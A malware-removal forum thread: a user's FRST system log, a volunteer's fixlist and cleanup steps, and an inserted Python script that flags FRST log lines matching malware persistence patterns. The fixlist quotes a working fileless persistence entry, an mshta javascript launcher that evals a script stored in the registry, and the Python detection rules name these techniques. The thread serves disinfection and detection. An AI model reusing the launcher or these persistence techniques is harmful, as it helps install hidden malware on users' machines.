FirewallRules: [{82C256A0-1CC6-4688-9824-FF3D6A876EEA}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{89031E60-A611-4C71-B272-E99C16C29AC3}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{D2A7D690-91F3-4534-8D9A-DAE6026D8B1A}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdater.exe
FirewallRules: [{6689BF1B-2209-4701-A948-71F52BE44B97}] => (Allow) C:\Program Files\iTunes\iTunes.exe
FirewallRules: [{AFBD6B65-616A-4963-8AEC-7DEDF9F8EFC0}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{3A12B802-2B08-4E1D-9AAD-053A47B92A7B}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [UDP Query User{D2A45460-C60F-463B-8DF8-30DE7EED949E}C:\users\harold\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\harold\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [TCP Query User{9B93A8E0-6E2C-4F2F-BE53-80FA46F7DEE0}C:\users\harold\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\harold\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [{2CA76AA4-B6D1-442A-916F-303A759B7162}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{F521F223-0CB3-4E1D-A4CF-747445576C5E}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{DC4A9BF3-85F0-498A-83E2-C05E3DFD4B00}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{3418E0C3-9127-4DC0-88CB-D53740BD9D10}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{295ED039-2C1C-4DF4-84F4-A8AA0C915CFC}] => (Allow) C:\Users\Harold\AppData\Roaming\Dropbox\bin\Dropbox.exe
FirewallRules: [{A56D746F-D9BF-4C0D-B1EF-D204E1C3DB57}] => (Allow) C:\Users\Harold\AppData\Roaming\Dropbox\bin\Dropbox.exe
FirewallRules: [UDP Query User{F1436E84-24DC-4C4E-AAB6-16FC56CFEE2C}C:\users\harold\appdata\local\akamai\netsession_win.exe] => (Block) C:\users\harold\appdata\local\akamai\netsession_win.exe
FirewallRules: [TCP Query User{CA49EE30-1DB1-4766-9506-68A6B0FEA7C1}C:\users\harold\appdata\local\akamai\netsession_win.exe] => (Block) C:\users\harold\appdata\local\akamai\netsession_win.exe
FirewallRules: [{B10F09BF-DBEF-4011-9B42-A65CBE4788F5}] => (Allow) C:\Users\Harold\AppData\Local\Akamai\netsession_win.exe
FirewallRules: [{9967C61C-8A0C-41FC-81E0-2526CF94BCC2}] => (Allow) C:\Users\Harold\AppData\Local\Akamai\netsession_win.exe
FirewallRules: [{B93EED00-1AE6-4C18-ABCF-03DDD3E46F96}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [{69B532F5-1028-4689-BC4E-0EC145A49DE5}] => (Allow) LPort=1900
FirewallRules: [{76819FC8-FC1A-4F12-B924-3C8E0D991D73}] => (Allow) LPort=2869
FirewallRules: [{13793C8A-94F4-4922-95E9-B8E495521BF7}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{9935848D-5C5B-40D5-B00B-759C2FEAAA46}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\MediaSmart\RoxioNow\RNow.exe
FirewallRules: [{A043FA11-6C26-4E9F-B0DF-7DBE66AD5E49}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\MediaSmart\RoxioNow\RNow.exe
FirewallRules: [{08EF55C6-09D5-4760-B23F-B72CA5395803}] => (Allow) C:\Program Files (x86)\Roxio\RoxioNow Player\RNowShell.exe
FirewallRules: [{112EE17F-BD1C-477A-8638-204E4289D31C}] => (Allow) C:\Program Files (x86)\Roxio\RoxioNow Player\RNowShell.exe
FirewallRules: [{E0B7F5D2-5C91-4A1F-89DE-DA6091F85C47}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\TouchSmart\Music\HPTouchSmartMusic.exe
FirewallRules: [{C8077DF7-39A9-4AA3-9C51-6680947D940E}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\MediaSmart\Video\HPMediaSmartVideo.exe
FirewallRules: [{4D31F622-50B1-46F4-B3B2-5AAFE086B9CA}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\MediaSmart\Photo\HPMediaSmartPhoto.exe
FirewallRules: [{0E164A7D-3795-4A54-A177-79B97333C664}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\Media\DVD\HPDVDSmart.exe
FirewallRules: [{C3754D26-2A24-4C2B-81AD-F5B243F61534}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\Media\DVD\Kernel\CLML\CLMLSvc.exe
FirewallRules: [{9530F6FA-89C5-48D6-B9C2-6A672501F320}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\Media\DVD\TSMAgent.exe
FirewallRules: [{C47FE2AD-EC2E-4230-8E43-6FC40AB0239F}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\Media\DVD\HPTouchSmartVideo.exe
FirewallRules: [{F31D01A8-A670-4477-BBDA-BD9225ECC8F0}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\Media\DVD\HPTouchSmartPhoto.exe
FirewallRules: [{8C5469AA-EE53-4B4D-B9AD-1B12114278AB}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\Media\DVD\HPTouchSmartMusic.exe
FirewallRules: [{ED6557CF-E2B5-4AFF-B4F0-CC83F2C579A2}] => (Allow) c:\Program Files (x86)\CyberLink\PowerDirector\PDR8.EXE
FirewallRules: [{ED391711-A77E-49C7-AB09-69EDF1943FFA}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{DF5956B1-6834-40DB-99BD-1FDB4FA106F4}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{B289C545-A0E2-4A89-AFA2-8FF4BE42C0C5}] => (Allow) C:\Program Files (x86)\Team MediaPortal\MediaPortal TV Server\TvService.exe
FirewallRules: [{F72701FE-38CA-4D50-A820-08923605C312}] => (Allow) C:\Program Files (x86)\Team MediaPortal\MediaPortal TV Server\TvService.exe
FirewallRules: [{0411946A-CC7B-477F-B863-E6E96CBD87CB}] => (Allow) C:\Program Files (x86)\Team MediaPortal\MediaPortal TV Server\SetupTv.exe
FirewallRules: [{6C214F1C-6F99-4CD2-AF90-3B22115BF512}] => (Allow) C:\Program Files (x86)\Team MediaPortal\MediaPortal TV Server\SetupTv.exe
FirewallRules: [{C26ED18F-51A8-4E7D-B2E6-C7E646D3C9B6}] => (Allow) C:\Program Files (x86)\Team MediaPortal\MediaPortal\MediaPortal.exe
FirewallRules: [{AE90B585-B953-4349-B2FA-E9416A1FC895}] => (Allow) C:\Program Files (x86)\Team MediaPortal\MediaPortal\MediaPortal.exe
FirewallRules: [{806AABEA-7D43-439C-A8EF-2C4C03E5417D}] => (Allow) LPort=3306

==================== Restore Points =========================

20-10-2016 10:08:15 Windows Update
23-10-2016 19:05:00 Windows Backup
29-10-2016 14:33:15 Windows Update

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (10/30/2016 03:46:35 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: plugin-container.exe, version: 49.0.2.6136, time stamp: 0x5807c043
Faulting module name: mozglue.dll, version: 49.0.2.6136, time stamp: 0x5807b9a7
Exception code: 0x80000003
Fault offset: 0x0000e83e
Faulting process id: 0x33ac
Faulting application start time: 0x01d232e61960eb20
Faulting application path: C:\Program Files (x86)\Mozilla Firefox\plugin-container.exe
Faulting module path: C:\Program Files (x86)\Mozilla Firefox\mozglue.dll
Report Id: 3289c41e-4b0c-408c-b315-31dc62fb33be
Faulting package full name:
Faulting package-relative application ID:

Error: (10/29/2016 07:20:43 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: svchost.exe_ProfSvc, version: 10.0.14393.0, time stamp: 0x57899b1c
Faulting module name: combase.dll, version: 10.0.14393.187, time stamp: 0x57cf994f
Exception code: 0xc0000005
Fault offset: 0x00000000000aed6c
Faulting process id: 0x424
Faulting application start time: 0x01d22d3df4522a84
Faulting application path: C:\WINDOWS\system32\svchost.exe
Faulting module path: C:\WINDOWS\System32\combase.dll
Report Id: 52919579-0d14-488b-a894-748072c7029f
Faulting package full name:
Faulting package-relative application ID:

Error: (10/29/2016 06:51:04 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2484) (User: Family-HP)
Description: Package Microsoft.Windows.Photos_16.722.10060.0_x64__8wekyb3d8bbwe+App was terminated because it took too long to suspend.

Error: (10/29/2016 06:28:18 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Family-HP)
Description: Activation of app Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe!Microsoft.MicrosoftOfficeHub failed with error: -2144927142 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (10/29/2016 02:34:23 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.

Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol.

System Error:
Access is denied.
.

Error: (10/29/2016 01:49:52 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Family-HP)
Description: Activation of app Microsoft.Windows.Photos_8wekyb3d8bbwe!App failed with error: -2147023170 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (10/29/2016 08:12:11 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 4610

Error: (10/29/2016 08:12:11 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 4610

Error: (10/29/2016 08:12:11 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (10/29/2016 08:12:10 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 3094


System errors:
=============
Error: (10/30/2016 06:36:49 PM) (Source: Ntfs) (EventID: 55) (User: NT AUTHORITY)
Description: A corruption was discovered in the file system structure on volume OS.

The exact nature of the corruption is unknown.  The file system structures need to be scanned online.

Error: (10/30/2016 05:42:07 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID
{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}
 and APPID
{F72671A9-012C-4725-9D2F-2A4D32D65169}
 to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Error: (10/30/2016 05:41:53 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The NetTcpActivator service depends on the NetTcpPortSharing service which failed to start because of the following error:
The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.

Error: (10/30/2016 05:37:38 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The eapihdrv service failed to start due to the following error:
This driver has been blocked from loading

Error: (10/30/2016 05:37:38 PM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\Users\Harold\AppData\Local\Temp\ehdrv.sys

Error: (10/30/2016 05:37:37 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The eapihdrv service failed to start due to the following error:
This driver has been blocked from loading

Error: (10/30/2016 05:37:37 PM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\Users\Harold\AppData\Local\Temp\ehdrv.sys

Error: (10/30/2016 05:37:37 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The eapihdrv service failed to start due to the following error:
This driver has been blocked from loading

Error: (10/30/2016 05:37:37 PM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\Users\Harold\AppData\Local\Temp\ehdrv.sys

Error: (10/30/2016 05:37:36 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The eapihdrv service failed to start due to the following error:
This driver has been blocked from loading


==================== Memory info ===========================

Processor: AMD Phenom™ II X6 1045T Processor
Percentage of memory in use: 45%
Total physical RAM: 8183.89 MB
Available physical RAM: 4468.89 MB
Total Virtual: 8695.89 MB
Available Virtual: 4491.88 MB

==================== Drives ================================

Drive c: (OS) (Fixed) (Total:917.38 GB) (Free:379.23 GB) NTFS
Drive d: (HP_RECOVERY) (Fixed) (Total:13.41 GB) (Free:1.64 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive e: (DATA_DRIVE_1) (Fixed) (Total:931.51 GB) (Free:79.91 GB) NTFS
Drive l: (FreeAgent Drive) (Fixed) (Total:931.51 GB) (Free:171.66 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 931.3 GB) (Disk ID: 8D95C33A)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=917.4 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=450 MB) - (Type=27)
Partition 4: (Not Active) - (Size=13.4 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: B0254860)
Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS)

========================================================
Disk: 7 (MBR Code: Windows XP) (Size: 931.5 GB) (Disk ID: CCCA59EF)
Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================



#4 dbrisendine


Posted 30 October 2016 - 07:59 PM

No problem on the double posting; someone already handled that.   Let's knock this thing out, OK?

If you have any questions or problems with these steps, please come back and ask for clarification until you are satisfied with the steps.

 

FIRST >>>>

Please go to START (Windows Orb) >> Control Panel >> Uninstall a Program or Programs and Features and remove the following (if listed):

QuickTime 7

To do so, left click on the name once and then click Uninstall/Change at the bar above the list window.

Follow the prompts of the uninstaller BUT please read carefully any questions it asks before answering; some uninstallers will try and deceive you into keeping the software.


SECOND >>>>

Open notepad by pressing the Windows Key + R key, typing notepad in the Run box and pressing Enter.  Please copy the contents of the quote box below. To do this highlight the contents of the box and right click on it and select copy. Paste this into the open notepad. Save it to your desktop as fixlist.txt
 

Start
CreateRestorePoint:
CloseProcesses:
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2014-10-02] (Apple Inc.)
SearchScopes: HKLM -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = hxxp://search.ask.com/web?q={searchterms}&l=dis&o=HPDTDF
SearchScopes: HKLM -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPDTDF
SearchScopes: HKLM -> {d43b3890-80c7-4010-a95d-1e77b5924dc3} URL = hxxp://en.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKLM -> {d944bb61-2e34-4dbf-a683-47e505c587dc} URL = hxxp://rover.ebay.com/rover/1/711-111092-2357-0/4?satitle={searchTerms}&mfe=Desktops
SearchScopes: HKLM -> {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPDTDF&pc=HPDTDF&src=IE-SearchBox
SearchScopes: HKLM-x32 -> DefaultScope {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPDTDF&pc=HPDTDF&src=IE-SearchBox
SearchScopes: HKLM-x32 -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = hxxp://search.ask.com/web?q={searchterms}&l=dis&o=HPDTDF
SearchScopes: HKLM-x32 -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPDTDF
SearchScopes: HKLM-x32 -> {d43b3890-80c7-4010-a95d-1e77b5924dc3} URL = hxxp://en.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKLM-x32 -> {d944bb61-2e34-4dbf-a683-47e505c587dc} URL = hxxp://rover.ebay.com/rover/1/711-111092-2357-0/4?satitle={searchTerms}&mfe=Desktops
SearchScopes: HKLM-x32 -> {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPDTDF&pc=HPDTDF&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001 -> DefaultScope {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPDTDF&pc=HPDTDF&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001 -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = hxxp://search.ask.com/web?q={searchterms}&l=dis&o=HPDTDF
SearchScopes: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001 -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPDTDF
SearchScopes: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001 -> {d43b3890-80c7-4010-a95d-1e77b5924dc3} URL = hxxp://en.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001 -> {d944bb61-2e34-4dbf-a683-47e505c587dc} URL = hxxp://rover.ebay.com/rover/1/711-111092-2357-0/4?satitle={searchTerms}&mfe=Desktops
SearchScopes: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001 -> {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPDTDF&pc=HPDTDF&src=IE-SearchBox
BHO-x32: Norton Vulnerability Protection -> {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -> C:\Program Files (x86)\Norton 360\Engine\21.7.0.11\IPS\IPSBHO.DLL => No File
BHO-x32: iSkysoft iMedia Converter Deluxe 5.1.0 -> {AEAF002F-E6D8-4A21-ABD3-2B309B79A6CE} -> C:\PROGRA~3\iSkysoft\VIDEOC~1\WSBROW~1.DLL => No File
Handler: WSISVCUchrome - {78A543EB-3A61-4ED3 -  No File
FF user.js: detected! => C:\Users\Harold\AppData\Roaming\Mozilla\Firefox\Profiles\be2mjg6m.default\user.js [2016-03-26]
FF Plugin HKU\S-1-5-21-1355648730-1136835254-2900194302-1001: @hulu.com/Hulu Desktop -> C:\Users\Default.migrated\AppData\Local\HuluDesktop\instances\0.9.13.1\nphdplg.dll [No File]
U3 idsvc; no ImagePath
Task: {182548B4-34C3-493B-9E25-80E7BECB6AEE} - System32\Tasks\{80D68447-CC1E-4AC0-8C98-D29AFA292270} => pcalua.exe -a C:\Users\Harold\Downloads\NOF-Essentials.exe -d "C:\Program Files (x86)\Mozilla Firefox"
Task: {24CF2868-3518-4830-ADEB-81A5230BD173} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {2917EE86-583E-4CED-848E-79DC2A6287E0} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {426D89B7-22E3-4132-B434-C26049460A35} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {503702D7-8726-42F3-A652-BB92440B76A9} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {74960916-8CB4-4A24-9C21-266DBF7C1613} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {825A3C24-77CF-4714-9606-2BE4B48D1F62} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {B1D2A3C3-2F0F-4AB8-B994-7D02F28EBA91} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {C36A6DB5-4989-40D8-885A-EB418B1C97FD} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {C6543766-4A8C-472F-8B19-CAFBF8CB18B7} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {CD289DED-2CCC-46B1-B7A6-D863153BD078} - System32\Tasks\{126C6E32-44AE-45CB-BF8C-B9605C8636F6} => pcalua.exe -a L:\Setup.exe -d L:\
Task: {CFC27006-0508-4E5A-B01F-AE139D853F8C} - \OfficeSoftwareProtectionPlatform\SvcRestartTask -> No File <==== ATTENTION
Task: {D82A5397-CB31-4135-8EE6-A6301B2406D1} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION
Task: {F2ADC65E-7099-42E2-B116-6BE9B5C5EED2} - System32\Tasks\{F5731F9E-4BFC-4B09-987E-D3B8F9F5F80A} => pcalua.exe -a C:\Windows\system32\pcwrun.exe -c "C:\Program Files (x86)\NetObjects\NetObjects Fusion Essentials\Fusion.exe"
Task: {F6DBD05A-D8A1-4E06-B4AB-9F4B41D83D65} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxldtlfudivq`qsp`26hfm [0]
IE trusted site: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\...\driversupport.com -> hxxp://apps.driversupport.com
IE trusted site: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\...\driversupport.com -> hxxps://apps.driversupport.com
HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\...\Run: [**lbpxghqil<*>] => "C:\Users\Harold\AppData\Local\0d9f76\909634.lnk" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\Software\Classes\9556ee: "C:\WINDOWS\system32\mshta.exe" "javascript:A8gDIF="gQr";A6C=new ActiveXObject("WScript.Shell");Zq58tMz="n";U0FdG=A6C.RegRead("HKCU\\software\\sdca\\hzqzf");Vo7QZ3="pCt64";eval(U0FdG);PlZSb8ur="l3m7Wyvw";" <===== ATTENTION
DeleteKey: HKCU\\software\\sdca
Startup: C:\Users\Harold\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ae5a3b.lnk [2016-10-30]
Startup: C:\Users\Harold\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d433f5.lnk [2016-10-08]
Shortcut: C:\Users\Harold\AppData\Local\0d9f76\909634.lnk -> C:\Users\Harold\AppData\Local\0d9f76\2eb755.bat ()
2016-10-08 09:38 - 2016-10-16 17:32 - 00000000 ____D C:\Users\Harold\AppData\Local\0d9f76
2016-10-08 09:38 - 2016-10-08 09:38 - 00000000 ____D C:\Users\Harold\AppData\Roaming\dc130f
C:\Users\Harold\jagex_runescape_preferences.dat
C:\Users\Harold\jagex_runescape_preferences2.dat
C:\Windows\SysWOW64\000*.tmp
C:\Program Files\Internet Explorer\000*.tmp
C:\Program Files (x86)\Internet Explorer\000*.tmp
cmd: ipconfig /flushdns
cmd: netsh advfirewall reset
cmd: netsh advfirewall set allprofiles state on
Reg: Reg Delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg" /F
Reg: Reg Add "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg" /F
Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
CMD: bitsadmin /reset /allusers
RemoveProxy:
EmptyTemp:
Reboot:
end


NOTE. It's important that both files, FRST64 and fixlist.txt are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system.

Start FRST that is on the desktop by right clicking on file and selecting "Run as Administrator..." and press the Fix button just once and wait.


If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
When finished FRST will generate a log on the Desktop (Fixlog.txt). Please post it to your reply.


LAST >>>>

Please download Malwarebytes Anti-Rootkit from here


  • Unzip the contents to a folder in a convenient location.
  • Open the folder where the contents were unzipped and run mbar.exe
  • Follow the instructions in the wizard to update and allow the program to scan your computer for threats.
  • Click on the Cleanup button to remove any threats and reboot if prompted to do so.
  • Wait while the system shuts down and the cleanup process is performed.
  • Perform another scan with Malwarebytes Anti-Rootkit to verify that no threats remain. If they do, then click Cleanup once more and repeat the process.
  • When done, please post the two logs produced; they will be in the MBAR folder: mbar-log.txt and system-log.txt



Information to Reply with >>>>


  • Any problems with the uninstall?
  • The Fixlog.txt log file text posted.
  • The Malwarebytes AntiRootkit logs (you can attach these if you like as the system-log.txt can be quite large).
  • How is your system running now?  Any more alerts from Norton?

 

 


Please do not ask for Malware help via PM (Private Messages).  Please post in the forum boards instead.  Thanks.

My help is always free but if you would like to help encourage me or show your thanks -----> btn_donate_LG.gif
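
The fixlist in the post above, read as detection logic: an added Python example (not dbrisendine's code and not part of FRST) that triages FRST-style log lines for the persistence pattern the fixlist removes, and recovers the registry key the mshta launcher reads its script from. The rule names and regexes are assumptions made for this illustration; the sample lines are copied from the fixlist.

```python
import re
from dataclasses import dataclass

# Sample input: lines copied from the fixlist above. The first two are
# ordinary leftovers; the last four are the entries tied to the detection.
SAMPLE_LINES = [
    r'HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2014-10-02] (Apple Inc.)',
    r'Task: {CFC27006-0508-4E5A-B01F-AE139D853F8C} - \OfficeSoftwareProtectionPlatform\SvcRestartTask -> No File <==== ATTENTION',
    r'HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\...\Run: [**lbpxghqil<*>] => "C:\Users\Harold\AppData\Local\0d9f76\909634.lnk" <===== ATTENTION (Value Name with invalid characters)',
    r'HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\Software\Classes\9556ee: "C:\WINDOWS\system32\mshta.exe" "javascript:A8gDIF="gQr";A6C=new ActiveXObject("WScript.Shell");Zq58tMz="n";U0FdG=A6C.RegRead("HKCU\\software\\sdca\\hzqzf");Vo7QZ3="pCt64";eval(U0FdG);PlZSb8ur="l3m7Wyvw";" <===== ATTENTION',
    r'Startup: C:\Users\Harold\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ae5a3b.lnk [2016-10-30]',
    r'Shortcut: C:\Users\Harold\AppData\Local\0d9f76\909634.lnk -> C:\Users\Harold\AppData\Local\0d9f76\2eb755.bat ()',
]

# Hypothetical rule set for this example. Each rule is one observable trait
# of the entries above; none is a vendor signature.
RULES = {
    # mshta.exe started with an inline script instead of an .hta file
    "mshta_inline_script": re.compile(
        r'mshta(?:\.exe)?"?\s+"?(?:javascript|vbscript):', re.I),
    # the inline script reads a registry value and evaluates it
    "script_evals_registry_value": re.compile(r'RegRead\(.*?\).*eval\(', re.I),
    # autorun value whose target is a shortcut rather than a program
    "run_value_targets_lnk": re.compile(
        r'\\Run: \[.*?\] => "?[^"]*\.lnk', re.I),
    # FRST's own annotation for value names regedit cannot display
    "frst_invalid_value_name": re.compile(r'Value Name with invalid characters'),
    # six-hex-character folder directly under AppData\Local or \Roaming
    "hex_named_appdata_dir": re.compile(
        r'\\AppData\\(?:Local|Roaming)\\[0-9a-f]{6}\\', re.I),
    # six-hex-character shortcut in the Startup folder
    "hex_named_startup_lnk": re.compile(r'\\Startup\\[0-9a-f]{6}\.lnk', re.I),
    # shortcut that resolves to a script file
    "lnk_targets_script": re.compile(
        r'\.lnk -> \S.*\.(?:bat|cmd|js|vbs|ps1)\b', re.I),
}

REGREAD = re.compile(r'RegRead\("([^"]+)"\)')


@dataclass
class Finding:
    line_no: int        # 1-based position in the input
    rules: list         # names of the rules that matched
    regread: list       # registry paths the inline script reads
    text: str


def regread_targets(line):
    """Registry paths passed to RegRead, with the script's \\\\ unescaped."""
    return [p.replace('\\\\', '\\') for p in REGREAD.findall(line)]


def triage(lines):
    """Return a Finding for every line that matches at least one rule."""
    findings = []
    for no, line in enumerate(lines, 1):
        hits = [name for name, rx in RULES.items() if rx.search(line)]
        if hits:
            findings.append(Finding(no, hits, regread_targets(line), line))
    return findings


def payload_keys(findings):
    """Keys holding the stored script. RegRead reads a named value unless the
    path ends in a backslash, so the last path component is dropped."""
    keys = set()
    for f in findings:
        for path in f.regread:
            if path.endswith('\\'):
                keys.add(path.rstrip('\\'))
            else:
                keys.add(path.rsplit('\\', 1)[0])
    return sorted(keys)


if __name__ == "__main__":
    results = triage(SAMPLE_LINES)
    for f in results:
        print(f"line {f.line_no}: {', '.join(f.rules)}")
    print("check these keys for stored script:", payload_keys(results))
```

The key it reports for the sample input is the same one the fixlist removes with its DeleteKey: line, which is why that line accompanies the mshta entry.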


#5 brokus4


Posted 30 October 2016 - 08:05 PM

Looks pretty straightforward. I am out of time tonight. I will do the above tomorrow night when I get home from work and let you know the results.

Thanks for the quick replies!



#6 dbrisendine


Posted 30 October 2016 - 08:34 PM

Cool; I think you'll be pleased.  I'll be looking for your reply tomorrow.




#7 brokus4


Posted 31 October 2016 - 08:45 PM

